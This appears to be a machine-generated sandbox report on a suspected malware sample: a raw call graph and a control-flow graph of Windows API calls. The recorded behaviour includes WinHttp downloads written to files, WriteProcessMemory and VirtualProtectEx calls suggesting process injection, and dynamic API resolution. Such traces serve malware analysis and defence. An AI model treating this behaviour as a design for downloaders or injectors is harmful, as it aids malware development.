calls 9144->9148 9150 1791c0 2 API calls 9145->9150 9157 173ce9 9145->9157 9146 173d45 9147 17bc60 HeapFree 9147->9146 9148->9145 9150->9157 9151 1791c0 2 API calls 9154 173c37 9151->9154 9152 181f60 10 API calls 9155 173c92 memcpy 9152->9155 9153 17bc60 HeapFree 9156 173c7b 9153->9156 9173 173d50 CreateFileW 9154->9173 9155->9144 9156->9152 9157->9146 9157->9147 9159 173c4b 9159->9153 9159->9156 9159->9157 9164 175ab0 9160->9164 9161 173baf 9161->9144 9161->9151 9161->9157 9161->9159 9164->9161 9172 175b3a Sleep 9164->9172 9182 175310 9164->9182 9203 171200 9164->9203 9218 1815a0 9164->9218 9237 176f50 9164->9237 9253 180fd0 9164->9253 9274 17e860 9164->9274 9293 177020 9164->9293 9312 17bcc0 9164->9312 9352 179220 9164->9352 9172->9164 9174 173d8b SetFilePointer SetFilePointer 9173->9174 9181 173db9 9173->9181 9175 173dc0 9174->9175 9174->9181 9176 181f60 10 API calls 9175->9176 9177 173dc8 9176->9177 9178 173dd1 ReadFile 9177->9178 9177->9181 9179 173dee 9178->9179 9178->9181 9180 17bc60 HeapFree 9179->9180 9180->9181 9181->9159 9183 175333 9182->9183 9184 175408 9183->9184 9393 17ed00 9183->9393 9184->9164 9186 175342 9186->9184 9403 17cf80 _time64 9186->9403 9188 175352 9189 1791c0 2 API calls 9188->9189 9190 175360 9189->9190 9415 171770 9190->9415 9194 1753ec 9197 1753f9 9194->9197 9200 17bc60 HeapFree 9194->9200 9195 1753d4 9195->9194 9198 17bc60 HeapFree 9195->9198 9197->9164 9198->9194 9200->9197 9204 171221 9203->9204 9205 1712a4 9204->9205 9206 17ed00 13 API calls 9204->9206 9205->9164 9207 17122c 9206->9207 9207->9205 9208 1791c0 2 API calls 9207->9208 9209 17123e 9208->9209 9210 171770 12 API calls 9209->9210 9211 171257 9210->9211 9212 171296 9211->9212 9213 178820 8 API calls 9211->9213 9212->9164 9216 17126c 9213->9216 9214 171290 9215 17bc60 HeapFree 9214->9215 9215->9212 9216->9214 9217 17ca10 12 API calls 9216->9217 9217->9214 9219 1815c3 9218->9219 9220 181680 9219->9220 9221 17ed00 13 API calls 9219->9221 9220->9164 9222 1815d2 9221->9222 9222->9220 9223 1791c0 2 API calls 9222->9223 9224 1815e9 9223->9224 9225 171770 12 API calls 9224->9225 9226 181602 9225->9226 9227 178820 8 API calls 9226->9227 9236 18164e 9226->9236 9229 18161b 9227->9229 9228 17bc60 HeapFree 9230 181666 9228->9230 9232 17ca10 12 API calls 9229->9232 9229->9236 9231 17bc60 HeapFree 9230->9231 9233 181673 9230->9233 9231->9233 9234 18163b 9232->9234 9233->9164 9234->9236 9501 17d620 9234->9501 9236->9228 9236->9230 9238 176f71 9237->9238 9239 17700a 9238->9239 9240 17ed00 13 API calls 9238->9240 9239->9164 9241 176f80 9240->9241 9241->9239 9242 176f88 _wtoi 9241->9242 9243 176fa5 9242->9243 9244 176f9a 9242->9244 9245 1791c0 2 API calls 9243->9245 9244->9164 9246 176fb3 9245->9246 9247 171770 12 API calls 9246->9247 9248 176fd4 9247->9248 9249 178820 8 API calls 9248->9249 9250 176fe9 9248->9250 9249->9250 9251 17bc60 HeapFree 9250->9251 9252 176ffe 9250->9252 9251->9252 9252->9164 9254 180ff4 9253->9254 9255 1810bb 9254->9255 9256 17ed00 13 API calls 9254->9256 9255->9164 9257 181003 9256->9257 9257->9255 9531 177ec0 9257->9531 9259 181018 9260 177ec0 14 API calls 9259->9260 9273 181077 9259->9273 9261 18102c 9260->9261 9263 1791c0 2 API calls 9261->9263 9261->9273 9262 17bc60 HeapFree 9265 18108c 9262->9265 9266 181041 9263->9266 9264 17bc60 HeapFree 9268 18109c 9264->9268 9265->9264 9265->9268 9270 171770 12 API calls 9266->9270 9267 17bc60 HeapFree 9269 1810ac 9267->9269 9268->9267 9268->9269 9269->9164 9271 18105e 9270->9271 9272 178820 8 API calls 9271->9272 9271->9273 9272->9273 9273->9262 9273->9265 9276 17e883 9274->9276 9275 17e94e 9275->9164 9276->9275 9277 17ed00 13 API calls 9276->9277 9278 17e892 9277->9278 9278->9275 9279 1791c0 2 API calls 9278->9279 9280 17e8a9 9279->9280 9281 171770 12 API calls 9280->9281 9282 17e8c2 9281->9282 9283 178820 8 API calls 9282->9283 9284 17e91a 9282->9284 9285 17e8db 9283->9285 9286 17e932 9284->9286 9288 17bc60 HeapFree 9284->9288 9285->9284 9290 17ca10 12 API calls 9285->9290 9287 17e93f 9286->9287 9289 17bc60 HeapFree 9286->9289 9287->9164 9288->9286 9289->9287 9291 17e8fb 9290->9291 9291->9284 9546 1810d0 9291->9546 9295 177043 9293->9295 9294 177106 9294->9164 9295->9294 9296 17ed00 13 API calls 9295->9296 9297 177052 9296->9297 9297->9294 9298 1791c0 2 API calls 9297->9298 9299 177069 9298->9299 9300 171770 12 API calls 9299->9300 9301 177082 9300->9301 9302 178820 8 API calls 9301->9302 9304 1770d2 9301->9304 9305 17709b 9302->9305 9303 1770ea 9307 1770f7 9303->9307 9308 17bc60 HeapFree 9303->9308 9304->9303 9306 17bc60 HeapFree 9304->9306 9305->9304 9309 17ca10 12 API calls 9305->9309 9306->9303 9307->9164 9308->9307 9310 1770bb 9309->9310 9310->9304 9565 17a0f0 9310->9565 9313 17bcf3 9312->9313 9314 17bcf7 9313->9314 9315 171170 11 API calls 9313->9315 9314->9164 9316 17bd0e 9315->9316 9326 17bd65 9316->9326 9335 17bd38 9316->9335 9586 17f590 9316->9586 9317 17bc60 HeapFree 9318 17be7c 9317->9318 9319 17bc60 HeapFree 9318->9319 9320 17be8c 9318->9320 9319->9320 9321 17bc60 HeapFree 9320->9321 9322 17be9c 9320->9322 9321->9322 9325 17bc60 HeapFree 9322->9325 9327 17beac 9322->9327 9323 1791c0 2 API calls 9329 17bd7b 9323->9329 9325->9327 9326->9323 9326->9335 9328 17bc60 HeapFree 9327->9328 9331 17bebc 9327->9331 9328->9331 9330 171770 12 API calls 9329->9330 9332 17bda0 9330->9332 9331->9164 9333 17be58 9332->9333 9332->9335 9336 17bdc6 9332->9336 9334 178820 8 API calls 9333->9334 9334->9335 9335->9317 9335->9318 9337 1791c0 2 API calls 9336->9337 9338 17bddc 9337->9338 9593 175880 9338->9593 9340 17bdfa 9607 17ea60 9340->9607 9341 17bdf6 9341->9340 9613 172c80 9341->9613 9345 17be2a 9643 17db20 9345->9643 9348 17be51 9350 17ea60 HeapFree 9348->9350 9349 17be4a 9351 17ea60 HeapFree 9349->9351 9350->9335 9351->9335 9354 17924e 9352->9354 9353 179558 9356 17bc60 HeapFree 9353->9356 9357 17956b 9353->9357 9362 177e20 11 API calls 9354->9362 9366 179341 9354->9366 9368 179369 9354->9368 9355 17bc60 HeapFree 9355->9353 9356->9357 9358 17bc60 HeapFree 9357->9358 9359 17957b 9357->9359 9358->9359 9360 17bc60 HeapFree 9359->9360 9361 17958b 9359->9361 9360->9361 9361->9164 9362->9366 9363 1791c0 2 API calls 9364 1793e5 9363->9364 9365 171770 12 API calls 9364->9365 9369 179406 9365->9369 9366->9353 9366->9363 9366->9368 9367 178820 8 API calls 9367->9368 9368->9353 9368->9355 9369->9368 9371 1791c0 2 API calls 9369->9371 9378 17951c 9369->9378 9381 17945b 9369->9381 9370 1794b4 9372 179514 9370->9372 9374 172c80 14 API calls 9370->9374 9373 179447 9371->9373 9375 17ea60 HeapFree 9372->9375 9377 175880 12 API calls 9373->9377 9379 1794d3 9374->9379 9375->9378 9376 1791c0 2 API calls 9380 17948c 9376->9380 9377->9381 9378->9367 9378->9368 9382 17945f 9379->9382 9387 1794e9 9379->9387 9383 175880 12 API calls 9380->9383 9381->9370 9381->9376 9381->9382 9385 17ea60 HeapFree 9382->9385 9384 1794a3 9383->9384 9384->9370 9386 1794a7 9384->9386 9385->9368 9388 17ea60 HeapFree 9386->9388 9389 17db20 8 API calls 9387->9389 9388->9368 9390 179506 9389->9390 9390->9372 9391 17950a 9390->9391 9392 17ea60 HeapFree 9391->9392 9392->9368 9394 17ed13 9393->9394 9395 17ed1c rand 9393->9395 9396 17bc60 HeapFree 9394->9396 9397 181f60 10 API calls 9395->9397 9399 17ed19 9396->9399 9398 17ed40 9397->9398 9400 17ed49 9398->9400 9401 17ed56 rand 9398->9401 9402 17ed8a 9398->9402 9399->9395 9400->9186 9401->9398 9402->9186 9404 17cfa8 9403->9404 9413 17d00a 9403->9413 9404->9413 9458 182f70 9404->9458 9406 17cfba 9407 17cfef 9406->9407 9408 17cfc1 9406->9408 9410 17cff5 9407->9410 9411 17bc60 HeapFree 9407->9411 9409 17cfd1 _time64 9408->9409 9412 17bc60 HeapFree 9408->9412 9409->9188 9410->9188 9411->9413 9414 17cfce 9412->9414 9413->9188 9414->9409 9416 181f60 10 API calls 9415->9416 9417 171780 9416->9417 9418 171789 _vsnwprintf 9417->9418 9420 1717ab 9417->9420 9419 1717a4 9418->9419 9419->9420 9421 17bc60 HeapFree 9419->9421 9420->9195 9422 178820 9420->9422 9421->9420 9423 17883e 9422->9423 9424 178857 WinHttpSetTimeouts 9423->9424 9432 1753a2 9423->9432 9425 1791c0 2 API calls 9424->9425 9426 178883 WinHttpOpenRequest 9425->9426 9427 1788b3 9426->9427 9426->9432 9428 1788d2 WinHttpSendRequest 9427->9428 9429 1788b8 WinHttpSetOption 9427->9429 9430 178918 WinHttpReceiveResponse 9428->9430 9428->9432 9429->9428 9429->9432 9431 178927 WinHttpQueryHeaders 9430->9431 9430->9432 9431->9432 9432->9195 9433 17ca10 9432->9433 9434 17ca2c 9433->9434 9436 1753b9 9433->9436 9435 17ca32 WinHttpQueryDataAvailable 9434->9435 9434->9436 9437 181f60 10 API calls 9434->9437 9438 17ca74 WinHttpReadData 9434->9438 9435->9434 9435->9436 9436->9195 9439 17f660 9436->9439 9437->9434 9438->9434 9438->9436 9440 17f68e 9439->9440 9441 17f683 9439->9441 9442 171170 11 API calls 9440->9442 9441->9195 9443 17f69d 9442->9443 9444 177b80 10 API calls 9443->9444 9445 17f6e1 9443->9445 9446 17f6bc 9444->9446 9448 17bc60 HeapFree 9445->9448 9453 17f762 9445->9453 9446->9445 9450 17f6cb _wtoi 9446->9450 9447 17f790 9447->9195 9448->9453 9449 17f787 9451 17bc60 HeapFree 9449->9451 9450->9445 9454 17f6e5 9450->9454 9451->9447 9452 17bc60 HeapFree 9452->9453 9453->9447 9453->9449 9453->9452 9454->9445 9455 181f60 10 API calls 9454->9455 9456 17f735 9455->9456 9456->9445 9457 17f73f memcpy 9456->9457 9457->9445 9476 175050 9458->9476 9460 1830f1 9461 1830f8 9460->9461 9462 183115 9460->9462 9487 171cc0 9461->9487 9463 1716e0 4 API calls 9462->9463 9465 18311d 9463->9465 9465->9406 9466 1830ff 9492 1716e0 9466->9492 9470 1791c0 memset memcpy 9473 182f92 9470->9473 9471 178820 8 API calls 9471->9473 9472 17ca10 12 API calls 9472->9473 9473->9460 9473->9470 9473->9471 9473->9472 9474 17bc60 HeapFree 9473->9474 9475 171170 11 API calls 9473->9475 9480 178320 9473->9480 9474->9473 9475->9473 9477 1791c0 2 API calls 9476->9477 9478 17507f WinHttpOpen 9477->9478 9479 17509e 9478->9479 9479->9473 9481 17832f 9480->9481 9482 178352 WinHttpConnect 9481->9482 9483 178386 9482->9483 9484 17836a 9482->9484 9483->9473 9485 176740 11 API calls 9484->9485 9486 178374 9485->9486 9486->9473 9488 1814a0 2 API calls 9487->9488 9489 171cda 9488->9489 9490 181f60 10 API calls 9489->9490 9491 171ce6 9490->9491 9491->9466 9493 1716f4 9492->9493 9494 1716f1 WinHttpCloseHandle 9492->9494 9495 1716fe 9493->9495 9496 1716fb WinHttpCloseHandle 9493->9496 9494->9493 9497 171708 9495->9497 9498 171705 WinHttpCloseHandle 9495->9498 9496->9495 9499 171715 9497->9499 9500 17bc60 HeapFree 9497->9500 9498->9497 9499->9406 9500->9499 9502 17d649 9501->9502 9503 17d63f 9501->9503 9504 171170 11 API calls 9502->9504 9503->9236 9505 17d658 9504->9505 9505->9503 9506 177b80 10 API calls 9505->9506 9507 17d673 9506->9507 9508 17d68b 9507->9508 9510 176740 11 API calls 9507->9510 9524 171690 9508->9524 9510->9508 9511 17d699 9512 177b80 10 API calls 9511->9512 9513 17d6dd 9511->9513 9512->9513 9514 17d73b 9513->9514 9515 17bc60 HeapFree 9513->9515 9516 17d758 9514->9516 9518 17bc60 HeapFree 9514->9518 9515->9513 9517 17d766 9516->9517 9520 17bc60 HeapFree 9516->9520 9519 17d776 9517->9519 9522 17bc60 HeapFree 9517->9522 9518->9514 9521 17d786 9519->9521 9523 17bc60 HeapFree 9519->9523 9520->9517 9521->9236 9522->9519 9523->9521 9525 1716c9 memset 9524->9525 9526 171699 9524->9526 9525->9511 9528 1716aa 9526->9528 9529 17bc60 HeapFree 9526->9529 9527 1716c7 9527->9525 9528->9527 9530 17bc60 HeapFree 9528->9530 9529->9528 9530->9528 9532 1791c0 2 API calls 9531->9532 9533 177ee1 LoadLibraryW 9532->9533 9534 177faf 9533->9534 9535 177efe 9533->9535 9534->9259 9536 176d80 2 API calls 9535->9536 9537 177f09 GetProcAddress 9536->9537 9538 177f1d 9537->9538 9542 177f4f 9537->9542 9539 181f60 10 API calls 9538->9539 9540 177f2f 9539->9540 9540->9542 9543 177f44 GetLastError 9540->9543 9541 177f93 9541->9259 9542->9541 9544 17bc60 HeapFree 9542->9544 9543->9542 9545 177f80 9544->9545 9545->9259 9547 1810f7 9546->9547 9548 1810ed 9546->9548 9549 171170 11 API calls 9547->9549 9548->9284 9550 181106 9549->9550 9550->9548 9551 177b80 10 API calls 9550->9551 9552 181122 9551->9552 9553 1811c3 9552->9553 9554 181131 _wtoi _wtoi 9552->9554 9556 17bc60 HeapFree 9553->9556 9558 1811d0 9553->9558 9554->9553 9555 181157 9554->9555 9555->9553 9562 181f60 10 API calls 9555->9562 9556->9558 9557 1811f6 9559 17bc60 HeapFree 9557->9559 9558->9557 9560 17bc60 HeapFree 9558->9560 9561 1811ff 9558->9561 9559->9561 9560->9558 9561->9284 9563 1811a5 9562->9563 9563->9553 9564 1811af memcpy 9563->9564 9564->9553 9566 17a11c 9565->9566 9567 17a112 9565->9567 9568 171170 11 API calls 9566->9568 9567->9304 9569 17a12b 9568->9569 9569->9567 9570 177b80 10 API calls 9569->9570 9571 17a147 9570->9571 9572 177b80 10 API calls 9571->9572 9585 17a18b 9571->9585 9583 17a168 9572->9583 9573 17a1d8 9577 17a1f4 9573->9577 9578 17bc60 HeapFree 9573->9578 9574 17bc60 HeapFree 9574->9573 9575 17a214 9576 17a221 9575->9576 9580 17bc60 HeapFree 9575->9580 9579 17a231 9576->9579 9582 17bc60 HeapFree 9576->9582 9577->9575 9581 17bc60 HeapFree 9577->9581 9578->9573 9579->9304 9580->9576 9581->9577 9582->9579 9584 181f60 10 API calls 9583->9584 9583->9585 9584->9585 9585->9573 9585->9574 9587 17f5c4 9586->9587 9588 17f5c8 9587->9588 9589 181f60 10 API calls 9587->9589 9588->9326 9590 17f5dd 9589->9590 9591 17f60a 9590->9591 9592 17bc60 HeapFree 9590->9592 9591->9326 9592->9591 9594 181f60 10 API calls 9593->9594 9595 17589d 9594->9595 9596 1758ad memcpy 9595->9596 9602 175968 9595->9602 9599 1758c9 9596->9599 9604 1758db 9596->9604 9597 17bc60 HeapFree 9598 17595b 9597->9598 9600 17bc60 HeapFree 9598->9600 9598->9602 9601 181f60 10 API calls 9599->9601 9599->9604 9600->9602 9603 1758f4 9601->9603 9602->9341 9603->9604 9605 181f60 10 API calls 9603->9605 9604->9597 9606 17592a 9604->9606 9605->9604 9606->9341 9608 17ea9f 9607->9608 9611 17ea69 9607->9611 9609 17bc60 HeapFree 9608->9609 9610 17eaae 9608->9610 9609->9610 9610->9335 9611->9608 9612 17bc60 HeapFree 9611->9612 9612->9611 9614 172ca3 9613->9614 9615 176d80 2 API calls 9614->9615 9616 172cb3 9615->9616 9654 1786c0 9616->9654 9619 1791c0 2 API calls 9621 172ce5 9619->9621 9620 172e70 9620->9340 9620->9345 9658 180e20 9621->9658 9623 172cfe 9623->9620 9624 181f60 10 API calls 9623->9624 9625 172d2d 9624->9625 9625->9620 9626 1791c0 2 API calls 9625->9626 9627 172d4e 9626->9627 9628 180e20 _vsnwprintf 9627->9628 9629 172d68 9628->9629 9630 172e88 9629->9630 9631 181f60 10 API calls 9629->9631 9632 17bc60 HeapFree 9630->9632 9638 172d83 9631->9638 9632->9620 9633 172e48 9634 176d80 2 API calls 9633->9634 9635 172e56 9634->9635 9636 1786c0 _vsnprintf 9635->9636 9639 172e69 9636->9639 9637 176d80 2 API calls 9637->9638 9638->9630 9638->9633 9638->9637 9638->9639 9640 1786c0 _vsnprintf 9638->9640 9642 172df3 memcpy 9638->9642 9639->9620 9641 17bc60 HeapFree 9639->9641 9640->9638 9641->9630 9642->9638 9644 17db3e 9643->9644 9645 17db57 WinHttpSetTimeouts 9644->9645 9653 17be43 9644->9653 9646 1791c0 2 API calls 9645->9646 9647 17db83 WinHttpOpenRequest 9646->9647 9648 17dbb7 9647->9648 9647->9653 9649 17dbd6 WinHttpSendRequest 9648->9649 9650 17dbbc WinHttpSetOption 9648->9650 9651 17dbf9 WinHttpReceiveResponse 9649->9651 9649->9653 9650->9649 9650->9653 9652 17dc08 WinHttpQueryHeaders 9651->9652 9651->9653 9652->9653 9653->9348 9653->9349 9655 1786cc 9654->9655 9656 1786dd _vsnprintf 9655->9656 9657 172cc9 9655->9657 9656->9657 9657->9619 9657->9620 9659 180e2c 9658->9659 9660 180e3d _vsnwprintf 9659->9660 9661 180e5f 9659->9661 9660->9661 9661->9623 9671 17d580 9673 17d590 9671->9673 9674 17d5c4 9673->9674 9677 177270 memset WinHttpCrackUrl 9673->9677 9675 17bc60 HeapFree 9674->9675 9676 17d5d3 9674->9676 9675->9676 9678 177524 9677->9678 9679 1772c5 9677->9679 9678->9673 9679->9678 9680 181f60 10 API calls 9679->9680 9681 1772e0 9680->9681 9681->9678 9682 181f60 10 API calls 9681->9682 9683 1772fd 9682->9683 9689 1791c0 2 API calls 9683->9689 9695 1774c8 9683->9695 9684 17bc60 HeapFree 9685 1774fd 9684->9685 9686 17bc60 HeapFree 9685->9686 9688 17750a 9685->9688 9686->9688 9687 177518 9687->9673 9688->9687 9690 17bc60 HeapFree 9688->9690 9691 17733c WinHttpOpen 9689->9691 9690->9687 9692 177361 WinHttpSetTimeouts WinHttpConnect 9691->9692 9691->9695 9693 17739d 9692->9693 9692->9695 9694 1791c0 2 API calls 9693->9694 9696 1773ab 9694->9696 9695->9684 9696->9695 9697 1773ea WinHttpOpenRequest 9696->9697 9697->9695 9698 1773fb WinHttpSendRequest 9697->9698 9698->9695 9699 177416 WinHttpReceiveResponse 9698->9699 9699->9695 9700 177427 WinHttpQueryHeaders 9699->9700 9700->9695 9701 17744e 9700->9701 9701->9695 9702 177460 WinHttpQueryDataAvailable 9701->9702 9703 1774bd 9701->9703 9705 181f60 10 API calls 9701->9705 9706 1774a3 WinHttpReadData 9701->9706 9702->9695 9702->9701 9707 171ad0 CreateFileW 9703->9707 9705->9701 9706->9695 9706->9701 9708 171b04 WriteFile 9707->9708 9709 171b23 9707->9709 9708->9709 9709->9695 8759 183543 __wgetmainargs 8760 179640 SetUnhandledExceptionFilter 11992 17ca2e 11995 17ca30 11992->11995 11993 17ca32 WinHttpQueryDataAvailable 11994 17ca91 11993->11994 11993->11995 11995->11993 11995->11994 11996 181f60 10 API calls 11995->11996 11997 17ca74 WinHttpReadData 11995->11997 11996->11995 11997->11994 11997->11995 11999 17b61c 12009 17b620 11999->12009 12000 181f60 10 API calls 12001 17b65f memset 12000->12001 12003 177b30 WriteProcessMemory 12001->12003 12002 17bb27 12004 177920 14 API calls 12002->12004 12005 17bb41 12002->12005 12003->12009 12004->12005 12006 17bc60 HeapFree 12005->12006 12007 17bb4e 12005->12007 12006->12007 12008 177b30 WriteProcessMemory 12008->12009 12009->12000 12009->12002 12009->12008 12010 17b6c6 12009->12010 12010->12002 12011 17b7af 12010->12011 12013 177b30 WriteProcessMemory 12010->12013 12011->12002 12012 171820 15 API calls 12011->12012 12015 17b894 12011->12015 12017 176670 15 API calls 12011->12017 12019 177b30 WriteProcessMemory 12011->12019 12012->12011 12013->12010 12014 17ba3f 12014->12002 12016 17bb15 12014->12016 12022 17dc60 VirtualProtectEx 12014->12022 12015->12002 12015->12014 12021 176d80 memset memcpy 12015->12021 12018 17e960 14 API calls 12016->12018 12017->12011 12018->12002 12019->12011 12021->12015 12022->12014

                  Executed Functions

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 17fe30-17fe56 call 173eb0 3 17fe60-17fe85 Sleep 0->3 5 17fe87-17ff19 SetCurrentDirectoryW srand call 17eda0 call 17bc10 3->5 14 17ff1f-17ff29 call 1735e0 5->14 15 1805f5-1805fb 5->15 21 17ff3d-17ff53 GetCurrentProcess IsWow64Process 14->21 22 17ff2b-17ff38 call 182bc0 call 17cab0 14->22 17 1806fb-180706 call 1795a0 call 177e10 ExitProcess 15->17 18 180601-18064b call 178030 call 181f60 15->18 43 1806a5-1806f9 call 17bc60 18->43 44 18064d-180657 18->44 25 17ff55-17ff60 call 17ea40 21->25 26 17ff68-17ff7e call 182f00 ??2@YAPAXI@Z 21->26 22->15 37 17ff65 25->37 40 17ff8b 26->40 41 17ff80-17ff82 call 17eac0 26->41 37->26 46 17ff8d-17ff96 call 173e30 40->46 49 17ff87-17ff89 41->49 43->17 47 180660-180668 44->47 57 17ff98-17ffa0 call 17cab0 46->57 58 17ffa5-17ffa7 46->58 50 18066a-180670 47->50 51 180680-180682 47->51 49->46 50->51 54 180672-18067c 50->54 55 18068c-180693 51->55 56 180684-180687 51->56 54->47 62 18067e 54->62 63 180695-1806a0 55->63 64 1806a3 55->64 56->55 57->15 59 17ffb9-18000e call 171b70 call 17bc50 ??2@YAPAXI@Z 58->59 60 17ffa9-17ffb6 call 172500 ??3@YAXPAX@Z 58->60 77 18001f 59->77 78 180010-18001d call 177150 59->78 60->59 62->56 63->64 64->43 79 180025-180072 call 1791c0 call 17f7d0 call 171f50 call 176a70 77->79 78->79 90 180094-1800b4 call 180ce0 79->90 91 180074-18008f call 171750 call 17fad0 call 17cab0 79->91 90->91 96 1800b6-1800ff call 175780 CreateThread 90->96 91->15 102 180100-180111 96->102 104 1805c0-1805d3 call 182ad0 102->104 105 180117-180132 call 1795f0 102->105 104->102 110 18014c-180175 _time64 105->110 111 180134-180147 105->111 112 1801e3-1801fe call 181d50 110->112 113 180177 110->113 119 1805a4-1805ba 111->119 122 18022d-180246 112->122 123 180200-180203 112->123 116 180180-18018f call 17da20 113->116 117 180179-18017e 113->117 121 180194-180199 116->121 117->112 117->116 119->104 119->105 124 1801c7-1801df 121->124 125 18019b-18019e 121->125 126 180248 122->126 127 180275-180290 call 174380 call 1814c0 122->127 128 180215-180228 123->128 129 180205-180212 call 17c980 123->129 124->112 133 1801b0-1801c2 125->133 134 1801a0-1801ad call 17c980 125->134 131 18024a-18024f 126->131 132 180251-18025f call 17adb0 126->132 148 180292-1802c3 call 1791c0 * 2 127->148 149 1802c5 127->149 128->119 129->128 131->127 131->132 142 180264-180269 132->142 147 1805a2 133->147 134->133 142->119 146 18026f-180272 142->146 146->127 147->119 162 18032b-180333 call 175a90 148->162 151 1802c7-1802f8 call 1791c0 * 2 149->151 152 1802fa-18032a call 1791c0 * 2 149->152 151->162 152->162 167 180336-18034d _time64 162->167 168 18034f-18035c 167->168 169 180367-180398 call 1737c0 167->169 171 18035e 168->171 172 18039f-1803ac 168->172 169->172 179 18039a 169->179 171->169 176 180360-180365 171->176 173 180407-180410 172->173 174 1803ae 172->174 180 180416 173->180 181 1804c3-1804d0 call 1799a0 173->181 177 1803b7-1803d4 174->177 178 1803b0-1803b5 174->178 176->169 176->172 177->173 185 1803d6 177->185 178->173 178->177 179->172 183 180424-18043e call 17f550 call 179ab0 180->183 184 180418-18041e 180->184 181->147 190 1804d6-1804e9 call 175a90 181->190 199 180440-180471 call 1791c0 * 2 183->199 200 180473-1804a3 call 1791c0 * 2 183->200 184->181 184->183 188 1803d8-1803dd 185->188 189 1803df-180401 call 172030 185->189 188->173 188->189 189->173 197 180574-18058b call 180ce0 189->197 190->147 202 1804ef-180500 call 177560 190->202 210 18058d-180597 197->210 211 1805d8-1805f3 call 171750 call 17fad0 call 17cab0 197->211 224 1804a4-1804c0 call 175a90 call 17bc60 _time64 199->224 200->224 213 180599-1805a0 202->213 214 180506-18050d 202->214 210->147 211->15 213->147 213->211 214->211 219 180513-18051f 214->219 222 180521-18052e 219->222 223 180530-180535 219->223 226 180537-18053b 222->226 223->226 227 180540-180548 223->227 224->181 226->227 229 180562-18056c 227->229 230 18054a-180560 227->230 229->167 233 180572 229->233 230->227 230->229 233->147
                  APIs
                    • Part of subcall function 00173EB0: ??2@YAPAXI@Z.MSVCRT ref: 00173EB7
                    • Part of subcall function 00173EB0: memset.MSVCRT ref: 00173ECD
                  • Sleep.KERNELBASE(00000001), ref: 0017FE80
                  • SetCurrentDirectoryW.KERNELBASE(?), ref: 0017FEF3
                  • srand.MSVCRT ref: 0017FF04
                    • Part of subcall function 0017EDA0: LoadLibraryW.KERNEL32(?), ref: 0017EDF2
                    • Part of subcall function 0017EDA0: LoadLibraryW.KERNEL32(?), ref: 0017EE19
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE47
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE6F
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE97
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EEBF
                    • Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E30000,?), ref: 0017EEE7
                    • Part of subcall function 0017BC10: CoInitializeEx.OLE32(00000000,00000000), ref: 0017BC14
                    • Part of subcall function 0017BC10: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0017BC33
                  • GetCurrentProcess.KERNEL32(?), ref: 0017FF44
                  • IsWow64Process.KERNELBASE(00000000), ref: 0017FF4B
                  • ??2@YAPAXI@Z.MSVCRT ref: 0017FF74
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176386
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 0017639E
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764AC
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764B2
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764B8
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 001764F9
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176517
                    • Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176538
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 0017660F
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 00176618
                    • Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 0017661E
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017FFB1
                    • Part of subcall function 00171B70: memset.MSVCRT ref: 00171BA3
                    • Part of subcall function 00171B70: memset.MSVCRT ref: 00171BB2
                    • Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BC9
                    • Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BE8
                  • ??2@YAPAXI@Z.MSVCRT ref: 00180004
                    • Part of subcall function 00171F50: memcpy.MSVCRT ref: 00171FEC
                    • Part of subcall function 00176A70: ??2@YAPAXI@Z.MSVCRT ref: 00176A86
                    • Part of subcall function 00176A70: ??2@YAPAXI@Z.MSVCRT ref: 00176AA1
                    • Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176BB0
                    • Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176BDE
                    • Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176C48
                    • Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176CA1
                    • Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FB8D
                    • Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FBA4
                    • Part of subcall function 00175780: ??2@YAPAXI@Z.MSVCRT ref: 001757D5
                    • Part of subcall function 00175780: ??3@YAXPAX@Z.MSVCRT ref: 0017582F
                  • CreateThread.KERNEL32(00000000,00000000,00182A70,?,00000000,?,?,?,?), ref: 001800FA
                  • _time64.MSVCRT ref: 0018014D
                    • Part of subcall function 0017DA20: ??2@YAPAXI@Z.MSVCRT ref: 0017DA7A
                    • Part of subcall function 0017DA20: ??3@YAXPAX@Z.MSVCRT ref: 0017DAB9
                    • Part of subcall function 0017DA20: _time64.MSVCRT ref: 0017DADB
                    • Part of subcall function 0017DA20: ??3@YAXPAX@Z.MSVCRT ref: 0017DB0B
                    • Part of subcall function 00181D50: ??2@YAPAXI@Z.MSVCRT ref: 00181D7F
                    • Part of subcall function 00181D50: ??3@YAXPAX@Z.MSVCRT ref: 00181DBE
                    • Part of subcall function 00181D50: _time64.MSVCRT ref: 00181DE0
                    • Part of subcall function 00181D50: ??3@YAXPAX@Z.MSVCRT ref: 00181E0D
                  • _time64.MSVCRT ref: 001804B4
                    • Part of subcall function 0017C980: _itow.MSVCRT ref: 0017C999
                    • Part of subcall function 0017ADB0: ??3@YAXPAX@Z.MSVCRT ref: 0017ADEF
